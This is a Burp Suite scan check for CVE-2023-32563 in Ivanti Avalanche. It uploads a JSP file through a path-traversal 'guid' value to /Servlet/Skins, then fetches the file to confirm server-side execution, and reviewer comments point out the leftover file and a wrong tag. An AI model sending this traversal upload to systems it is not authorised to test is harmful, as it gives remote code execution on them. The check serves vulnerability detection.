CVE-2023-32563 - Ivanti Avalanche - RCE.bcheck
# https://twitter.com/wvuuuuuuuuuuuuu/status/1694956245742923939
#
# Burp BCheck for CVE-2023-32563 (Ivanti Avalanche). Mechanism as written
# below: a multipart POST to /Servlet/Skins whose "guid" part carries a
# path-traversal value and whose "file" part is a small JSP that prints a
# random marker; a follow-up GET for that JSP reports the issue when the
# marker appears in the response body.
#
# NOTE(review): the "SSTI" tag does not match the mechanism shown (a
# traversal-assisted file write, not template injection); a tag such as
# "Path Traversal" or "File Upload" would describe it more accurately.
# NOTE(review): on a positive result the uploaded {test_file}.jsp stays on
# the host -- nothing in this check removes it -- so record the random
# name and remove the file during clean-up.
# NOTE(review): the rendered page shows 45 of the file's 57 lines; the blank
# header/body separator lines of both raw requests appear to have been
# dropped in display -- confirm against the source file before use.
metadata:
language: v2-beta
name: "CVE-2023-32563 - Ivanti Avalanche - RCE"
description: "Checks for CVE-2023-32563"
author: "DemonGod"
tags: "Ivanti", "SSTI", "RCE"
# Per-run random values: the JSP file name (17 chars) and the marker it
# prints (20 chars). The Content-Length below is hard-coded for these lengths.
define:
test_file = {random_str(17)}
test_nonce = {random_str(20)}
given host then
# check_1: upload the probe JSP. Content-Length: 333 is fixed and only matches
# this exact body (CRLF line endings, 17/20-char random values); recompute it
# if any part of the request body changes.
send request called check_1:
`POST /Servlet/Skins HTTP/1.1
Host: {base.request.url.host}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: {user_agent}
Content-Length: 333
Content-Type: multipart/form-data; boundary=------------------------92afcaa4bcd3c990
Connection: close
--------------------------92afcaa4bcd3c990
Content-Disposition: form-data; name="guid"
../../../Web/webapps/ROOT
--------------------------92afcaa4bcd3c990
Content-Disposition: form-data; name="file"; filename="{test_file}.jsp"
<%
out.println("{test_nonce}");
%>
--------------------------92afcaa4bcd3c990--`
# check_2: request the uploaded file; a server that executed it returns the marker.
send request called check_2:
`GET /{test_file}.jsp HTTP/1.1
Host: {base.request.url.host}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: {user_agent}
Connection: close
`
# Detection: the marker in check_2's body is direct evidence that the uploaded
# JSP ran. The issue is reported as tentative; with a random 20-char marker a
# false positive is unlikely, so "firm" may be the more accurate confidence.
if {test_nonce} in {check_2.response.body} then
report issue:
severity: high
confidence: tentative
detail: "Ivanti Avalanche - Remote Code Execution."
end if